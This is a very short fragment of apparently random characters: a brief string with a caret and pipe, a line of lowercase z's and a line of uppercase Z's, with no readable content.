^ZwiP|B
zzzzzzz
ZZZZZZZZZZ